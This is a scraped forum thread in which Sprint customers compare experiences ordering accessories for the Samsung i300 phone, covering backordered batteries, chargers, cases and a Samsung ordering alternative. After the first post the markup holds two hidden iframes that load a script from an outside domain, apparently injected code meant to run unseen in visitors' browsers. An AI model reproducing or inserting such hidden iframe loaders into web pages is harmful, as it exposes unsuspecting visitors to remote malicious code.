+ Reply to Thread

Thread: Accessories

Accessories

Has anyone ordered accessories from the Sprint web site and actually received them? Or is there a better place to get them.

Specifically I want to order some extended batteries. Does anyone have one yet, what is the actual usage time with them? Also the case that is sold on Sprints web site.... anyone have one of those? What are you impressions of it?

Carl<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I ordered a basestation, web connection kit, car charger, and travel charger....

they charged my credit card..... but said everything was backordered...

Brooks

Re: Accessories

Originally posted by CarlGalgano
    Has anyone ordered accessories from the Sprint web site and actually received them? Or is there a better place to get them.

Specifically I want to order some extended batteries. Does anyone have one yet, what is the actual usage time with them? Also the case that is sold on Sprints web site.... anyone have one of those? What are you impressions of it?

Carl
    I know of no one that has received an extra battery. Most, not all, of the reviews of that case I have seen have not been favorable.

See my appends at http://www2.pdabuzz.com/Forums/showt...5&pagenumber=2 about a Sanyo case at Target that might be ok for you.

Battery life for me is about 2 days. Many are getting a full day, some are getting less. It depends on how heavy you use it, whether you have configured the phone to use SprintPCS only and not to roam, whether you have turned off IR beam receive, and whether the battery has been broken in yet.

Alan/Brooks:
    Thanks for the links to the pic of your case. It does look like what I am after, very similar to the case I have for my Kyocera. The i300 actually fits in that case (a little loose), but perhaps I can out some foam in the bottom of it.

I would like to order some stuff from sprint, but don't want to wait a year to get it. Sprint did a much better job w/the 6035 rollout. I had accessories right away. I want to order 2 extended batteries, a car charger and a travel charger. The web connection kit is a joke, it's a freekin cable, and Sprint charges bib buck for it. I actually have an AirCard 510, so I have little use to use my i300 as a wireless modem. Brooks mentioned a base station.... what is that, is that a cradle. Brooks, can you explain. I don't even think I saw that on Sprint's web site. I think the extended batteries will be key, that is the biggest drawback to the i300 and may eventually drive me back to the 6035.
    Carl

i too have ordered batteries travel chargers etc but not gotten anything.
    I am a heavy phone user both on and off the sprint network so i get about .5 days from a battery. with our the xtended battery ot the travel charger i have to lug to base station around with me when i travel.

I meant the charge/sync cradle...

Brooks

Accessories available on Samsung Website

I also got the stupid 200 case from sprint, even though I ordered the I300 case and a car charger. Didn't recieve the charger and the N200 case looks nothing like the I300! And I was also charged for both. Talking on the phone with sprint, returning it all, and waiting for new stuff drives me crazy and costs so much time! Anyway, the accessories are now available on the SAMSUNG website with pictures (although small ones). I ordered a case from them and should get it today. They seem to be much more reliable than sprint. Here is the link:

http://www.samsungusa.com/cgi-bin/na...od_id=SPH-I300

If it doesn't work, just brows to it from http://www.samsungusa.com

Ordered some exra styluses, car charger, leather case/pouch, and an extra cradle from a Samsung rep over the phone. Before I ordered had him check the inventory and he said all my purchases were in stock...guess we'll see on Monday! Cancelled my accessories order with Sprint BTW.

Administrator

Arrow

thanks for the heads up with samsung!